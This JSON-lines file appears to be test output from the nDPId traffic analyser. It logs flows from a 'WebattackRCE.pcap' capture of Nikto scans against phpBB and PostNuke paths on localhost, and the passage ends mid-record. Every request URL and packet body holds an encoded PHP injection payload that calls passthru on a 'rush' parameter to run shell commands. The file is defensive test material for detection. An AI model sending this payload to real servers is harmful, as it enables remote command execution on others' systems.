{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 